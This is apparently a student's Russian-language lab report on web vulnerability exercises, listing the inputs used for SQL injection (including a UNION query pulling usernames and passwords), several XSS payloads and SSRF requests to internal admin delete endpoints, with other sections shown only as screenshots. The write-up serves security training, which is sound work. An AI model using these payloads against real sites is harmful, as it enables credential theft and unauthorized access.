# Отчёт по Пр. Заданию 3 ###### tags: `Web basic` Итоговая статистика пройденных атак ![](https://i.imgur.com/X1AVSqR.jpg) ![](https://i.imgur.com/NsqnrtK.jpg) SQL-injection уязвимости: 1. Ввел в поле UserName строку: administrator'-- ![](https://i.imgur.com/DBCSEdb.png) 2. В запросе в поисковой строке сверху после category= добавил строку ' or true -- ![](https://i.imgur.com/n5vSrs7.png) 3. В запросе в поисковой строке сверху была вставлена строка: ' UNION SELECT username, password from users-- . Тем самым получив логины и пароли пользователей из соответствующей таблицы. Далее введены в форму логина данные пользователя administrator. ![](https://i.imgur.com/z7qzOb6.png) 4. В программе Burp был отправлен запрос который можно увидеть на скрине. ![](https://i.imgur.com/kHri18y.png) XSS уязвимости: 1. В коммендариях к новости был вставлен код: <script>alert(1)</script> ![](https://i.imgur.com/n8JFHuS.png) 2. В поиске вставлена строка: \"\>\<svg onload=alert(1)> ![](https://i.imgur.com/ZiK7Dgq.png) 3. В поиске вставлена строка: '-alert(1)-' ![](https://i.imgur.com/DhPmT2u.png) 4. В поиске вставлена строка: \\"-alert(1)}// ![](https://i.imgur.com/zpNH7xn.png) CSRF: 1. ![](https://i.imgur.com/gRr10xm.png) 2. ![](https://i.imgur.com/0uFpaEk.png) SSRF: 1. Был проведён такой запрос: http://localhost/admin/delete?username=carlos ![](https://i.imgur.com/E2yS87Q.png) 2. Был проведён такой запрос: /product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos ![](https://i.imgur.com/BTEDju6.png) RCE: 1. ![](https://i.imgur.com/cb2NrXh.png) Path traversal: 1. ![](https://i.imgur.com/JSo5oSp.png) 2. ![](https://i.imgur.com/X11fD8v.png)